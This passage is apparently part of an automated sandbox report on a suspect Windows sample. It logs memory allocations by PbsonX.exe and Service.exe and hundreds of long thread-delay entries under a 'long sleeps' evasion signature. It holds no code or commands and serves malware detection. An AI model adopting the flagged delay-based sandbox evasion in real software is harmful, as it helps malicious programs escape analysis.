Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 4FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 1830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 3230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 1830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1460000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: F40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 29C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 28C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2490000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 22B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2B20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4B20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2CE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2A50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3140000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 32D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 52D0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599544 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599435 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599327 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597217 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596931 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596767 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596600 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596483 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596373 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596266 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599217 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599108 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598230 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598113 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597992 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597872 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597436 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597327 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597218 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597108 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596999 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596671 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596232 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595684 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595244 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594923 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594623 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594513 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594402 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594117 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593484 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593366 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593248 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593140 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599639
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599420
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598417
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598134
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598025
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596047
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595384
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595065
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594654
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594544
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594258
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593625
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593507
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593390
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593149
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592937
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592819
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599405
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599172
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598827
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598579
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598454
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598342
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598233
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598072
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597963
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596579
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596454
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596329
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596204
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596079
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595954
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595579
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594829
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594439
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594313
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594196
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593954
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593782
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593445
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593328
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593219
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593087
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592859
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592747
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592233
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592076
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 591933
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 591828
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598373
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598088
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597978
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597641
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597407
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597282
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597157
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597032
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596797
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595779
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595338
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595018
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594608
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594497
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594345
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594211
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593798
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593578
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593460
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593344
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593234
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593103
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592891
